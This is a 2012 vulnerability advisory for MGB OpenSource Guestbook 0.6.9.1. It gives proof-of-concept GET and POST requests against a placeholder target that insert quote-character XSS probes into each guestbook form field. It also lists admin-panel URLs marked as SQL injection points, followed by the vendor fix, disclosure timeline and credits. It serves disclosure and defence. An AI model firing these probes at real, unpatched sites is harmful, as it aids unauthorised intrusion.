Advisory: MGB OpenSource Guestbook 0.6.9.1 Multiple security vulnerabilities Advisory ID: SSCHADV2012-017 Author: Stefan Schurtz Affected Software: Successfully tested on MGB OpenSource Guestbook 0.6.9.1 Vendor URL: http://www.m-gb.org Vendor Status: fixed ========================== Vulnerability Description ========================== The MGB OpenSource Guestbook is prone to multiple security vulnerabilities ================== PoC-Exploit ================== // XSS # GET http://[target]/mgb/index.php?p=1'" # POST http://[target]/mgb/newentry.php sent=1&name='"&city=test&email=test%40local.de&icq=&aim=&msn=&hp=http%3A%2F%2F&message=test&textsize=&textcolor=&user_notification=1&user_show_email=1&preview=Vorschau sent=1&name=test&city='"&email=test%40local.de&icq=&aim=&msn=&hp=http%3A%2F%2F&message=test&textsize=&textcolor=&user_notification=1&user_show_email=1&preview=Vorschau sent=1&name=test&city=test&email='"&icq=&aim=&msn=&hp=http%3A%2F%2F&message=test&textsize=&textcolor=&user_notification=1&user_show_email=1&preview=Vorschau sent=1&name=test&city=test&email=test@local.net&icq='"&aim=&msn=&hp=http%3A%2F%2F&message=test&textsize=&textcolor=&user_notification=1&user_show_email=1&preview=Vorschau sent=1&name=test&city=test&email=test@local.net&icq=&aim='"&msn=&hp=http%3A%2F%2F&message=test&textsize=&textcolor=&user_notification=1&user_show_email=1&preview=Vorschau sent=1&name=test&city=test&email=test@local.net&icq=&aim=&msn=='"&hp=http%3A%2F%2F&message=test&textsize=&textcolor=&user_notification=1&user_show_email=1&preview=Vorschau sent=1&name=test&city=test&email=test@local.net&icq=&aim=&msn=&hp='"&message=test&textsize=&textcolor=&user_notification=1&user_show_email=1&preview=Vorschau sent=1&name='"&city=test&email=test%40local.de&icq=&aim=&msn=&hp=http%3A%2F%2F&message=test&textsize=&textcolor=&user_notification=1&user_show_email=1& sent=1&name=test&city='"&email=test%40local.de&icq=&aim=&msn=&hp=http%3A%2F%2F&message=test&textsize=&textcolor=&user_notification=1&user_show_email=1 sent=1&name=test&city=test&email='"&icq=&aim=&msn=&hp=http%3A%2F%2F&message=test&textsize=&textcolor=&user_notification=1&user_show_email=1 sent=1&name=test&city=test&email=test@local.net&icq='"&aim=&msn=&hp=http%3A%2F%2F&message=test&textsize=&textcolor=&user_notification=1&user_show_email=1 sent=1&name=test&city=test&email=test@local.net&icq=&aim='"&msn=&hp=http%3A%2F%2F&message=test&textsize=&textcolor=&user_notification=1&user_show_email=1 sent=1&name=test&city=test&email=test@local.net&icq=&aim=&msn=='"&hp=http%3A%2F%2F&message=test&textsize=&textcolor=&user_notification=1&user_show_email=1 sent=1&name=test&city=test&email=test@local.net&icq=&aim=&msn=&hp='"&message=test&textsize=&textcolor=&user_notification=1&user_show_email=1 // SQLi (Admin backend) http://[target]/mgb/admin/admin.php?action=delete&id=[SQLi]&p=1 http://[target]/mgb/admin/admin.php?action=deactivate&id=[SQLi]&p=1 ========= Solution ========= Upgrade to the latest version 0.6.9.2 ==================== Disclosure Timeline ==================== 05-Jul-2012 - developer informed 07-Jul-2012 - feedback from developer 15-Jul-2012 - fixed by developer ======== Credits ======== Vulnerabilities found and advisory written by Stefan Schurtz. =========== References =========== http://www.darksecurity.de/advisories/2012/SSCHADV2012-017.txt